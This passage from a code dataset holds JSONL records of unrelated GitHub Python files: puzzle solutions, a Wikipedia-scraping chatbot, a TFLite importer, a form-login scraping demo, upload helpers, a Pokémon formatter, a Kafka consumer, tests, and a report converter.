scanners.append(Scanner(len(scanners), scanner))\n\n return scanners\n\n\ndef scan_list(target: Scanner, to_be_scanned: set[Scanner]) -> set[Scanner]:\n to_remove = set()\n\n for scanner in to_be_scanned:\n for rotation in cube_rotations:\n test_beacons = (rotation @ scanner.beacons.T).T\n dist_mat = np.round(\n cdist(test_beacons, target.beacons, \"cityblock\")\n ).astype(\"int\")\n unique_vals, counts = np.unique(dist_mat, return_counts=\"True\")\n\n point_found = False\n\n for dval in np.unique(counts)[::-1]:\n if dval < 12:\n break\n # check if this possible distance has 12 of the same offset\n offsets_dict = Counter()\n dist_inds = np.where(dist_mat == unique_vals[np.where(counts == dval)])\n for i in range(len(dist_inds[0])):\n offset = tuple(\n test_beacons[dist_inds[0][i]] - target.beacons[dist_inds[1][i]]\n )\n offsets_dict[offset] += 1\n point_found = False\n for val in offsets_dict:\n if offsets_dict[val] >= 12:\n target.add_new_points(scanner, val, rotation)\n scanner.offset = np.array(val)\n to_remove |= {scanner}\n point_found = True\n break\n if point_found:\n break\n if point_found:\n break\n\n return to_be_scanned - to_remove\n\n\ndef solve_b(s: str) -> int:\n scanners = parse_input(s)\n to_check = copy.deepcopy(scanners[0])\n to_scan = set(scanners[1:])\n\n while len(to_scan) > 0:\n to_scan = scan_list(to_check, to_scan)\n\n return f\"{largest_distance(scanners)}\"\n\n\ndef largest_distance(scanners):\n maxdist = -np.inf\n for ii, x in enumerate(scanners):\n for y in scanners[ii:]:\n maxdist = max(np.linalg.norm(x.offset - y.offset, ord=1), maxdist)\n return maxdist\n","repo_name":"dshemetov/advent-of-code-solutions","sub_path":"advent/advent2021/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70610132063","text":"# -*- coding: utf-8 -*-\n\n\nimport nltk\nimport numpy as np\nimport random\nimport string\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport bs4 as bs\nimport urllib.request\nimport re\nnltk.download('punkt')\n\n#file1 = open('AI.txt', 'w')\n\nraw_html = 
urllib.request.urlopen(\"https://en.wikipedia.org/wiki/Chatbot\")\n\n\nraw_html = raw_html.read()\n\n\narticle_html = bs.BeautifulSoup(raw_html, 'lxml')\n\narticle_paragraphs = article_html.find_all('p')\n\narticle_text = ''\n\nfor para in article_paragraphs:\n article_text += para.text\n\n\narticle_text = article_text.lower()\n\n\narticle_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\narticle_text = re.sub(r'\\s+', ' ', article_text)\ntype(article_paragraphs)\n\n\narticle_sentences = nltk.sent_tokenize(article_text)\narticle_words = nltk.word_tokenize(article_text)\n\nprint(article_text)\n\n\n\n\n\ndef app(arg):\n raw_html = urllib.request.urlopen(arg)\n\n\n raw_html = raw_html.read()\n\n\n article_html = bs.BeautifulSoup(raw_html, 'lxml')\n\n article_paragraphs = article_html.find_all('p')\n\n article_text = ''\n\n for para in article_paragraphs:\n article_text += para.text\n\n article_text = str(article_text)\n article_text = article_text.lower()\n\n\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n article_sentences = nltk.sent_tokenize(article_text)\n article_words = nltk.word_tokenize(article_text)\n #print(article_text)\n return (article_words)\n\ndef app_sentence(arg):\n raw_html = urllib.request.urlopen(arg)\n\n\n raw_html = raw_html.read()\n\n\n article_html = bs.BeautifulSoup(raw_html, 'lxml')\n\n article_paragraphs = article_html.find_all('p')\n\n article_text = ''\n\n for para in article_paragraphs:\n article_text += para.text\n\n article_text = str(article_text)\n article_text = article_text.lower()\n\n\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n article_sentences = nltk.sent_tokenize(article_text)\n article_words = nltk.word_tokenize(article_text)\n #print(article_text)\n return (article_sentences)\n\n\ndef app_textm(arg):\n raw_html = urllib.request.urlopen(arg)\n raw_html = raw_html.read()\n\n article_html = bs.BeautifulSoup(raw_html, 'lxml')\n article_paragraphs = article_html.find_all('p')\n article_text = ''\n\n for para in article_paragraphs:\n article_text += para.text\n \n article_text = str(article_text)\n article_text = article_text.lower()\n\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n article_sentences = nltk.sent_tokenize(article_text)\n article_words = nltk.word_tokenize(article_text)\n #print(article_text)\n return (article_text)\n\n\n\narticle_text = article_text + app_textm(\"https://en.wikipedia.org/wiki/United_States\") + app_textm(\"https://en.wikipedia.org/wiki/Nature\")\n\narticle_words = app(\"https://en.wikipedia.org/wiki/United_States\") + app(\"https://en.wikipedia.org/wiki/Nature\")\n\narticle_words = article_words + app(\"https://en.wikipedia.org/wiki/Human\") +app(\"https://en.wikipedia.org/wiki/Earth\")+app(\"https://en.wikipedia.org/wiki/Sun\")\n\narticle_sentences = article_sentences + app_sentence(\"https://en.wikipedia.org/wiki/Human\") +app_sentence(\"https://en.wikipedia.org/wiki/Earth\")+app_sentence(\"https://en.wikipedia.org/wiki/Sun\")\n\narticle_text = article_text + app_textm(\"https://en.wikipedia.org/wiki/Human\") +app_textm(\"https://en.wikipedia.org/wiki/Earth\")+ app_textm(\"https://en.wikipedia.org/wiki/Sun\")\n\narticle_sentences = article_sentences + app_sentence(\"https://en.wikipedia.org/wiki/United_States\") + app_sentence(\"https://en.wikipedia.org/wiki/Nature\")\n\nwnlemmatizer = nltk.stem.WordNetLemmatizer()\n\ndef 
perform_lemmatization(tokens):\n return [wnlemmatizer.lemmatize(token) for token in tokens]\n\npunctuation_removal = dict((ord(punctuation), None) for punctuation in string.punctuation)\n\ndef get_processed_text(document):\n return perform_lemmatization(nltk.word_tokenize(document.lower().translate(punctuation_removal)))\n\ngreeting_inputs = (\"hey\", \"HI\", \"good morning\", \"good evening\", \"morning\", \"evening\", \"hi\", \"whatsup\",\"hello\",\"howdy\",\"you fine\",\"what are you doing\")\ngreeting_responses = [\"Hey\", \"Hey Hows you?\", \"*Nods*\", \"Hello, How you doing\", \"Hello\", \"Welcome, I am good and you\",\"Hello Ask me something \",\"Hey back bro\"]\n\ndef generate_greeting_response(greeting):\n for token in greeting.split():\n if token.lower() in greeting_inputs:\n return random.choice(greeting_responses)\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef generate_response(user_input):\n tennisrobo_response = ''\n article_sentences.append(user_input)\n\n word_vectorizer = TfidfVectorizer(tokenizer=get_processed_text, stop_words='english')\n all_word_vectors = word_vectorizer.fit_transform(article_sentences)\n similar_vector_values = cosine_similarity(all_word_vectors[-1], all_word_vectors)\n similar_sentence_number = similar_vector_values.argsort()[0][-2]\n\n matched_vector = similar_vector_values.flatten()\n matched_vector.sort()\n vector_matched = matched_vector[-2]\n\n if vector_matched == 0:\n tennisrobo_response = tennisrobo_response + \"I am sorry ? Can you elborate please :p\"\n return tennisrobo_response\n else:\n tennisrobo_response = tennisrobo_response + article_sentences[similar_sentence_number]\n return tennisrobo_response\n\nnltk.download('wordnet')\nword_vectorizer = TfidfVectorizer(tokenizer=get_processed_text, stop_words='english')\nall_word_vectors = word_vectorizer.fit_transform(article_sentences)\n\nsimilar_vector_values = cosine_similarity(all_word_vectors[-1], all_word_vectors)\n\nsimilar_sentence_number = similar_vector_values.argsort()[0][-2]\n\ncontinue_dialogue = True\nprint(\"Hello, I am your friend AI_BOT.You can ask me any question regarding a lot of things :\")\nwhile(continue_dialogue == True):\n human_text = input()\n human_text = human_text.lower()\n if human_text != 'bye':\n if human_text == 'thanks' or human_text == 'thank you very much' or human_text == 'thank you bro':\n continue_dialogue = False\n print(\"AI_BOT: Most welcome\")\n else:\n if generate_greeting_response(human_text) != None:\n print(\"AI_BOT: \" + generate_greeting_response(human_text))\n else:\n print(\"AI_BOT: \", end=\"\")\n print(generate_response(human_text))\n article_sentences.remove(human_text)\n else:\n continue_dialogue = False\n print(\"AI_BOT: Good bye and take care of yourself...\")\n\n\n\n\n\n\n\n","repo_name":"starktynt/NN_nltk-chatbot","sub_path":"python_chatbot.py","file_name":"python_chatbot.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"69916523105","text":"# 풀이 과정\n# https://blog.naver.com/alsrua7222/222630179772\n\nimport sys\ninput = sys.stdin.readline\n\nfor _ in range(int(input())):\n x, y = map(int, input().split())\n if x == y:\n print(0)\n else:\n r = int((y - x) ** .5 + .5)\n if y - x <= r ** 2:\n print(r * 2 - 1)\n else:\n print(r * 
2)","repo_name":"alsrua7222/BOJ_Algorithm_Study","sub_path":"Solved/4000/4395/4395.py","file_name":"4395.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5655011289","text":"from qti.aisw.converters.common.utils.argparser_util import ArgParserWrapper\nfrom .relay_importer import RelayImporter\nfrom tvm.relay.frontend import tflite as tflite_to_relay\n\n# TFLite.Model.Model has changed to TFLite.Model from 1.14 to 2.1\ntry:\n import tflite\nexcept TypeError:\n import tflite.Model as tflite\n\n\nclass TFLiteImporter(RelayImporter):\n class ArgParser(ArgParserWrapper):\n def __init__(self, **kwargs):\n super(TFLiteImporter.ArgParser, self).__init__(conflict_handler='resolve', **kwargs)\n self.add_required_argument('-d', '--input_dim', nargs=2, action='append',\n metavar=('INPUT_NAME', 'INPUT_DIM'),\n help=\"The names and dimensions of the network input layers specified \"\n \"in the format [input_name comma-separated-dimensions], \"\n \"for example: \\n\"\n \" 'data' 1,224,224,3\\n\"\n \"Note that the quotes should always be included in order to handle\"\n \"special characters, spaces, etc. \\n\"\n \"For multiple inputs specify multiple --input_dim on the command \"\n \"line like: \\n\"\n \" --input_dim 'data1' 1,224,224,3 --input_dim 'data2' 1,50,100,3\")\n self.add_optional_argument('--input_dtype', nargs=2, action='append',\n metavar=('INPUT_NAME', 'INPUT_DTYPE'),\n help=\"The names and datatype of the network input layers specified \"\n \"in the format [input_name datatype], \"\n \"for example: \\n\"\n \" 'data' 'float32'\\n\"\n \"Default is float32 if not specified\\n\"\n \"Note that the quotes should always be included in order to handle\"\n \"special characters, spaces, etc. 
\\n\"\n \"For multiple inputs specify multiple --input_dtype on the command \"\n \"line like: \\n\"\n \" --input_dtype 'data1' 'float32' --input_dtype 'data2' 'float32'\")\n\n def __init__(self, args):\n super(TFLiteImporter, self).__init__(args)\n\n self.shape_dict = {}\n for in_name, in_dims in args.input_dim:\n self.shape_dict[in_name] = [int(i) for i in in_dims.split(',')]\n\n if args.input_dtype:\n self.dtype_dict = {in_name: in_dtype for in_name, in_dtype in args.input_dtype}\n else:\n self.dtype_dict = {}\n for input_name in self.shape_dict:\n if input_name not in self.dtype_dict:\n self.dtype_dict[input_name] = \"float32\"\n\n def convert_to_relay(self, input_model_path, **kwargs):\n if isinstance(input_model_path, str):\n tflite_model_buf = open(input_model_path, \"rb\").read()\n elif isinstance(input_model_path, bytes):\n tflite_model_buf = input_model_path\n else:\n raise TypeError(\"Unsupported type {} for {}\".format(type(input_model_path), input_model_path))\n tflite_model = tflite.Model.GetRootAsModel(tflite_model_buf, 0)\n try:\n self.mod, self.params, output_names_dict = tflite_to_relay.from_tflite(tflite_model, self.shape_dict, self.dtype_dict)\n except ValueError:\n self.mod, self.params = \\\n tflite_to_relay.from_tflite(tflite_model, self.shape_dict, self.dtype_dict)\n output_names_dict = {}\n return self.mod, self.params, output_names_dict\n","repo_name":"senthilkumarl87/snpe-docker","sub_path":"snpe-1.53.2/lib/python/qti/aisw/converters/relay/importers/tflite_importer.py","file_name":"tflite_importer.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36759258016","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom requests import Session, exceptions\n\nfrom requests.auth import HTTPBasicAuth\n\nfrom utils import connection_util\n\n\ndef post_login():\n params = {'username': 'admin', 'passwd': '123alsdfiow####***'}\n\n r = requests.post(\"http://www.test.com/admin/index.php?c=session&a=login\", data=params)\n print(r.text)\n\n\ndef upload_image():\n files = {'uploadFile': open('files/2fe7243c7c113fad443b375a021801eb6277169d.png', 'rb')}\n r = requests.post(\"http://pythonscraping.com/pages/processing2.php\", files=files)\n print(r.text)\n\n\ndef http_auth():\n auth = HTTPBasicAuth('user', '123##@de09pp')\n r = requests.post(url=\"http://www.test.com:1111/\", auth=auth)\n print(r.text)\n\n\nclass GetCookie(object):\n def __init__(self):\n self._session = Session()\n self._init_connection = connection_util.ProcessConnection()\n\n def get_cookie_by_login(self):\n get_token = self.get_request_verification_token()\n # 另外一个 session 中\n # get_token=self.request_verification_token()\n if get_token:\n params = {'__RequestVerificationToken': get_token, 'Email': '123@gmail.com',\n 'Password': '123@pd-09',\n 'RememberMe': True}\n r = self._session.post('https://pdf-lib.org/account/admin', params)\n # 如果使用 request_verification_token 此处会出现 500 错误\n if r.status_code == 500:\n print(r.content.decode('utf-8'))\n print('Cookie is set to:')\n print(r.cookies.get_dict())\n print('--------------------------------')\n print('Going to post article page..')\n # 此处如果是使用 requests.get 并不会获取后台文章内容,由于并不是在同一个会话对象当中\n # r = requests.get('https://pdf-lib.org/account/users')\n r = self._session.get('https://pdf-lib.org/account/users')\n print(r.text)\n\n def get_request_verification_token(self):\n # 连接网站\n try:\n headers = {\n 
\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"}\n html = self._session.get(\"https://pdf-lib.org/account/admin\", headers=headers)\n except (exceptions.ConnectionError, exceptions.HTTPError, exceptions.Timeout) as e:\n return False\n try:\n bsObj = BeautifulSoup(html.text, features='html.parser')\n except AttributeError as e:\n return False\n if bsObj:\n try:\n get_token = bsObj.find(\"input\", {\"name\": \"__RequestVerificationToken\"}).get(\"value\")\n except Exception as e:\n print(f\"ot unhandled exception {e}\")\n return False\n return get_token\n\n def request_verification_token(self):\n # 此处仍然会获取所需要的内容\n get_content = self._init_connection.init_connection('https://pdf-lib.org/account/admin')\n if get_content:\n try:\n get_token = get_content.find(\"input\", {\"name\": \"__RequestVerificationToken\"}).get(\"value\")\n except Exception as e:\n print(f\"ot unhandled exception {e}\")\n return False\n return get_token\n\n\nif __name__ == '__main__':\n http_auth()\n","repo_name":"sycct/Scrape_1_1","sub_path":"form_post.py","file_name":"form_post.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"4706283349","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport base64\nimport logging\nimport math\nimport os\nimport shutil\nfrom collections import namedtuple\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom ziggurat_cms.models.element_upload import ElementUpload\nfrom ziggurat_cms.lib import generate_slug_text\nfrom ziggurat_foundations.models.services import BaseService\n\nlog = logging.getLogger(__name__)\n\nFileNameTuple = namedtuple('FileNameTuple',\n ['filename', 'orginal_filename', 'extension'])\n\n\nclass ElementUploadBaseService(BaseService):\n @classmethod\n def gen_directory(cls, root_dir, path_dir, pkey=None):\n abs_upload_dir = os.path.abspath(os.path.join(root_dir, path_dir))\n if not os.path.exists(abs_upload_dir):\n os.mkdir(abs_upload_dir, mode=0o774)\n\n if pkey is None:\n return abs_upload_dir\n\n milions = math.floor(pkey / 1000000)\n abs_mil_path = os.path.abspath(\n os.path.join(root_dir, path_dir, str(milions)))\n if not os.path.exists(abs_mil_path):\n os.mkdir(abs_mil_path, mode=0o774)\n\n thousands = math.floor((pkey - milions * 1000000) / 5000)\n final_path = os.path.join(path_dir, str(milions), str(thousands))\n abs_final_path = os.path.abspath(\n os.path.join(root_dir, final_path))\n if not os.path.exists(abs_final_path):\n os.mkdir(abs_final_path, mode=0o774)\n return abs_final_path\n\n @classmethod\n def gen_filename(cls, pkey, prefix, filename):\n orginal_filename = os.path.basename(filename)\n extension = None\n split_ext = os.path.splitext(orginal_filename)\n if len(split_ext) > 1:\n extension = split_ext[1]\n name = generate_slug_text(orginal_filename, allow_dots=True)\n filename = '{}_{}_{}'.format(pkey, prefix, name)\n return FileNameTuple(filename, orginal_filename, extension[1:])\n\n @classmethod\n def save_file(cls, file_obj, upload_dir, filename):\n final_path = os.path.abspath(os.path.join(upload_dir, filename))\n try:\n log.info('copying to %s' % upload_dir)\n shutil.copyfileobj(file_obj, open(final_path, 'w+b'))\n except Exception as exc:\n 
log.error(str(exc), extra={\n 'file_name': filename,\n 'upload_dir': upload_dir,\n 'exception_message': str(exc),\n 'callable': 'ElementUploadService.save_file'\n })\n raise\n\n @classmethod\n def delete_file(cls, root_dir, upload_dir, filename):\n final_path = os.path.abspath(\n os.path.join(root_dir, upload_dir, filename))\n try:\n os.remove(final_path)\n except Exception as exc:\n log.error(\n str(exc), extra={\n 'file_name': filename,\n 'final_path': final_path,\n 'callable': 'ElementUploadService.delete_file'\n })\n\n @classmethod\n def by_uuid(cls, uuid, db_session):\n query = db_session.query(ElementUpload)\n query = query.filter(ElementUpload.uuid == uuid)\n return query.first()\n\n\nclass ElementUploadImageBaseService(ElementUploadBaseService):\n @classmethod\n def get_image_obj(cls, file_obj):\n return Image.open(file_obj)\n\n @classmethod\n def save_resized_image(cls, image_obj, filename, upload_dir, max_size):\n final_path = os.path.abspath(os.path.join(upload_dir, filename))\n if image_obj.size[0] > max_size[0] or image_obj.size[1] > max_size[1]:\n copied = image_obj.copy()\n copied.thumbnail(max_size)\n copied.save(final_path)\n else:\n image_obj.save(final_path)\n\n @classmethod\n def base64_thumbnail(cls, image_obj, size):\n image_obj.thumbnail(size)\n jpg_fp = BytesIO()\n image_obj.save(jpg_fp, format='jpeg')\n encoded = base64.b64encode(jpg_fp.getvalue())\n return encoded.decode()\n","repo_name":"ergo/ziggurat_cms","sub_path":"backend/ziggurat_cms/services/element_upload.py","file_name":"element_upload.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23309561986","text":"\"\"\" Script to split raw images to individual parking slots.\n\nusage: split_raw_images.py [-h] --input-folder INPUT_FOLDER --output-folder\n OUTPUT_FOLDER --conf CONF\n\noptional arguments:\n -h, --help show this help message and exit\n --input-folder INPUT_FOLDER, -i INPUT_FOLDER\n input folder with raw images\n --output-folder OUTPUT_FOLDER, -o OUTPUT_FOLDER\n output folder with cropped slot images\n --conf CONF, -c CONF parking configuration json\n\"\"\"\n\nimport argparse\nimport json\nimport os\n\nfrom crop_helpers import verify_conf, create_output_folder, extract_and_save\n\n\ndef main():\n \"\"\" Main function.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--input-folder', '-i', dest='input_folder',\n help='input folder with raw images', required=True)\n parser.add_argument('--output-folder', '-o', dest='output_folder',\n help='output folder with cropped slot images',\n required=True)\n parser.add_argument('--conf', '-c', dest='conf',\n help='parking configuration json', required=True)\n args = parser.parse_args()\n with open(args.conf) as f_conf:\n conf = json.load(f_conf)\n\n verify_conf(conf)\n create_output_folder(args.output_folder, conf)\n for filename in os.listdir(args.input_folder):\n if filename.endswith('.jpg'):\n extract_and_save(os.path.join(args.input_folder, filename),\n args.output_folder,\n conf)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SoftServeInc/smartparking","sub_path":"model/split_raw_images.py","file_name":"split_raw_images.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"7"} +{"seq_id":"71161630942","text":"from evolutions import get_evolutions\nfrom emoji import typing_emoji, stats_rating_emoji\nfrom misc import get_abilities, 
get_gender_percentage, stat_abbr\n\n\ndef get_base_data(pk, pkmn_data, species, extra_data):\n    name = species.names[7].name\n    artwork_link = pkmn_data.sprites.front_default.replace(\"pokemon\", \"pokemon/other/official-artwork\")\n    dex_number = species.order\n    types = [ty.type.name.title() for ty in pkmn_data.types]\n    types_text = \" / \".join(types)\n    emoji = typing_emoji(types[0])\n    abilities = get_abilities(pkmn_data)\n    abilities_text = \" / \".join(abilities[\"abilities\"])\n    hidden_ability = abilities[\"hidden_ability\"] if abilities[\"hidden_ability\"] else \"---\"\n    evolution_text = get_evolutions(pk, species)\n    stats = {stat.stat.name: stat.base_stat for stat in pkmn_data.stats}\n    rating = stats_rating_emoji(stats)\n    genus = species.genera[7].genus\n    height = str(pkmn_data.height / 10) + \" m\"\n    weight = str(pkmn_data.weight / 10) + \" kg\"\n    text = f\"\"\"{name}
{emoji}\nSpecies: {genus}\nNational Dex number: {dex_number}\nType: {types_text}\nAbilities: {abilities_text}\nHidden Ability: {hidden_ability}\nHeight: {height}\nWeight: {weight}\n\nEvolutions\n{evolution_text}\n{extra_data}\nBase stats\n{stats[\"hp\"]} HP {rating[\"hp\"]}\n{stats[\"attack\"]} ATK {rating[\"attack\"]}\n{stats[\"defense\"]} DEF {rating[\"defense\"]}\n{stats[\"special-attack\"]} SPA {rating[\"special-attack\"]}\n{stats[\"special-defense\"]} SPD {rating[\"special-defense\"]}\n{stats[\"speed\"]} SPE {rating[\"speed\"]}\n \"\"\"\n return text\n\n\ndef get_advanced_data(pkmn_data, species):\n gender_percentage = get_gender_percentage(species)\n base_friendship = species.base_happiness\n ev_yield = {stat_abbr(stat.stat.name): stat.effort for stat in pkmn_data.stats if stat.effort != 0}\n ev_yield_text = \" / \".join([str(ev_yield[stat]) + \" \" + stat for stat in ev_yield])\n catch_rate = species.capture_rate\n growth_rate = species.growth_rate.name.title().replace(\"-\", \" \")\n egg_groups = [group.name.title().replace(\"-\", \" \") for group in species.egg_groups]\n egg_groups_text = \" / \".join(egg_groups)\n egg_cycles = species.hatch_counter\n text = f\"\"\"\\nGames data\nGender (male/female): {gender_percentage}\nBase friendship: {base_friendship}\nEV yield: {ev_yield_text}\nCatch rate: {catch_rate}\nGrowth rate: {growth_rate}\nEgg groups: {egg_groups_text}\nEgg cycles: {egg_cycles}\n\"\"\"\n return text\n\n\ndef pokemon_text(pk, pkmn, expanded):\n pkmn_data = pk.get_pokemon(pkmn)\n species = pk.get_pokemon_species(pkmn)\n extra_data = get_advanced_data(pkmn_data, species) if expanded else \"\"\n return get_base_data(pk, pkmn_data, species, extra_data)\n","repo_name":"Bharathboy1/Bharath","sub_path":"src/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"13173663502","text":"import itertools\n\n\ndef _is_pre(s, ch, need_space):\n if not s.startswith(ch):\n return\n r = len(list(itertools.takewhile(lambda c: ch == c, s)))\n if not need_space:\n return r\n if r < len(s) and s[r].isspace():\n return r\n\n\ndef is_line_head(s):\n return _is_pre(s, '+', True)\n\n\ndef get_headers(filename, lines):\n '''\n Gets list of tuples in format:\n ((x1, y1, x2, y2), level, title, icon)\n '''\n res = []\n tick = False\n for i, s in enumerate(lines):\n if not s.strip():\n continue\n if s.lstrip().startswith('<<'):\n tick = True\n continue\n if s.lstrip().startswith('>>'):\n tick = False\n continue\n if tick:\n continue\n r = is_line_head(s)\n if r:\n res.append( ((0, i, 0, i+1), r, s[r:].strip(), -1) )\n return res\n","repo_name":"CudaText-addons/cuda_tree_wikidpad","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39782947080","text":"import json\nimport logging\nfrom utils import get_consumer\n\nformatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\")\n\nhandler = logging.FileHandler(\"app.log\")\nhandler.setFormatter(formatter)\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nlogger.addHandler(handler)\n\ndef handle_order_confirmed(msg):\n username = msg.value[\"user\"]\n logger.info(f\"(Order confirmed) Email sent to {username}\")\n\n\ndef handle_order_completed(msg):\n username = msg.value[\"user\"]\n logger.info(f\"(Order delivered) Email sent to 
{username}\")\n\n\ndef messaging_service():\n print(\"Messaging service listening...\")\n handlers = {\n \"order_confirmed\": handle_order_confirmed,\n \"order_completed\": handle_order_completed,\n }\n topics=[\"order_confirmed\", \"order_completed\"]\n consumer = get_consumer(\"messaging-group\", topics)\n for msg in consumer:\n handler = handlers.get(msg.topic)\n if handler:\n handler(msg)\n\n\nif __name__ == \"__main__\":\n messaging_service()\n","repo_name":"quamejnr/kafka-app","sub_path":"messaging_service/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"11944753148","text":"import unittest\nfrom erp_app import app, db\nfrom erp_app.models.user import User\nfrom erp_app.models.department import Department\nfrom erp_app.models.noodle_manufacturing_process import NoodleManufacturingProcess\nfrom erp_app.services.noodle_manufacturing_process_service import start_process, end_process\n\nclass TestNoodleManufacturingProcess(unittest.TestCase):\n\n def setUp(self):\n self.app = app.test_client()\n self.db = db\n\n self.user = User(username='test', password='test')\n self.department = Department(name='Manufacturing')\n self.noodle_process = NoodleManufacturingProcess(name='Test Process')\n\n self.db.session.add(self.user)\n self.db.session.add(self.department)\n self.db.session.add(self.noodle_process)\n self.db.session.commit()\n\n def tearDown(self):\n self.db.session.remove()\n self.db.drop_all()\n\n def test_start_process(self):\n response = start_process(self.user.id, self.department.id, self.noodle_process.id)\n self.assertEqual(response, 'process_start')\n\n def test_end_process(self):\n response = end_process(self.user.id, self.department.id, self.noodle_process.id)\n self.assertEqual(response, 'process_end')\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Asenterprises/AICO","sub_path":"erp_app/tests/test_noodle_manufacturing_process.py","file_name":"test_noodle_manufacturing_process.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37729796653","text":"class Solution:\n def mostFrequent(self, nums: List[int], key: int) -> int:\n \"\"\"\n Logic: Hash Map/Counter\n \n Time: O(n)\n Space: O(n)\n \"\"\"\n target = collections.defaultdict(int)\n\n for i in range(len(nums)-1):\n if nums[i] == key:\n target[nums[i+1]] += 1\n \n for k, v in target.items():\n if v == max(target.values()):\n return k\n \n return max(target.values())\n","repo_name":"hanelliotn/leetcode","sub_path":"02190-MostFrequentNumberFollowingKeyInAnArray.py","file_name":"02190-MostFrequentNumberFollowingKeyInAnArray.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"34161446949","text":" # -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 30 20:51:29 2020\n\n@author: aylin\n\"\"\"\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom uygulamakod import MainWindow\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n mainWindow = MainWindow()\n mainWindow.show()\n sys.exit(app.exec_())\nif __name__ == \"__main__\":\n 
main()","repo_name":"muhendishanimm/Goruntu-isleme","sub_path":"uygulamamain.py","file_name":"uygulamamain.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33927874248","text":"# SPDX-License-Identifier: Apache-2.0\n# Licensed to the Ed-Fi Alliance under one or more agreements.\n# The Ed-Fi Alliance licenses this file to you under the Apache License, Version 2.0.\n# See the LICENSE and NOTICES files in the project root for more information.\n\n# This is a stand-alone script for converting JSON output files to HTML\n\nfrom datetime import datetime\nimport json\nimport os\nfrom typing import Dict, List\n\n# Enable running from this directory or from parent\nDIRECTORY = \"../reports\" if os.path.exists(\"../reports\") else \"reports\"\n\n\ndef convert(file_name: str, file_contents: str, lines: List[str]) -> List[str]:\n file_name = file_name.split(\".\")[0]\n lines.append(f\"

{file_name}

\")\n\n doc: Dict[str, dict] = json.loads(file_contents)\n for repository in doc.keys():\n lines.append(f\"

{repository}

\")\n repo_data: dict = doc[repository]\n score: int = repo_data[\"score\"]\n result: str = repo_data[\"result\"]\n\n if result == \"OK\":\n lines.append(f\"

🟢 Score: {score}\")\n else:\n lines.append(f\"

🔴 Score: {score}\")\n\n lines.append(\"

Findings:

\")\n lines.append(\"
    \")\n description: Dict[str, str] = repo_data[\"description\"]\n for key in description.keys():\n value = description[key]\n if value == \"OK\":\n continue\n else:\n lines.append(f\"
  • {key}: {value}\")\n lines.append(\"
